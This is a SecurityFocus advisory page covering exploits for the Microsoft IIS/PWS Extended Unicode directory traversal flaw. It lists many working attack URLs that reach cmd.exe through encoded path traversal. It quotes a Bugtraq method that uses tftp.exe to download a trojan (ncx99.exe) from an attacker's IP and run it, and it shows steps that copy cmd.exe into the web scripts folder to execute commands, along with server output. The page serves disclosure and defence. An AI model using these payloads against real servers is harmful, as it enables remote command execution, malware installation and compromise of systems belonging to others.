Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following examples were provided:

http://target/scripts/..%c1%1c../path/file.ext

Eg.

http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir

http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/
cmd.exe?/c+dir

Zoa_Chien <zoachien@securax.org> describes the following exploits using TFTP or Samba in his post to Bugtraq:

By using tftp.exe that comes with NT and win2k by connecting and
downloading a trojan from a tftp daemon you can bypass these
restrictions. Install < ftp://ftp.cavebear.com/karl/tftpd32.zip >
and connect from your compromised to your local machine using the
command " tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe ".
You van do so wiith this url:
/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
then all you have to do is run the trojan with:
/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe

You might also use the samba commands: "net share and net user"
on the target and "net use" on the local machine... but this does
not always seem to work. (coz. netbios is not installed?)

In their post to Bugtraq, Nsfocus Security Team <security@nsfocus.com> describes how to execute commands using a redirect on the target host:

(1) copy "..\..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe"

http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe

IIS returned :

"CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:


1 file(s) copied."


(2) run "cmd1.exe /c echo abc >aaa & dir & type aaa "

http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa

IIS returned :

" Directory of c:\inetpub\scripts

10/25/2000 03:48p <DIR> .
10/25/2000 03:48p <DIR> ..
10/25/2000 03:51p 6 aaa
12/07/1999 05:00a 236,304 cmd1.exe
..
abc
"

Optyx <optyx@newhackcity.net> has released the following exploits:

iis-zang.c
iis-zang.exe
iis-zang.obsd
iis-zang.linux

Roelof Temmingh <roelof@sensepost.com> has released the following exploits:

unicodecheck.pl
unicodexecute.pl
unicodexecute2.pl

<Eliel.Sardanons@philips.edu.ar> has released the following exploit:

iisuni.c

BoloTron <bolo@mundivia.com> has provided the following exploit:

iis-kabom.php

Gabriel Maggiotti <gmaggiot@ciudad.com.ar> has provided the following exploit:

all_uniexp.c

This is the vulnerability exploited by the Code Blue Worm.

SPAX <spabam@yahoo.com> has provided the following exploit:

IIS-PLUS.PL


 

Privacy Statement
Copyright 2010, SecurityFocus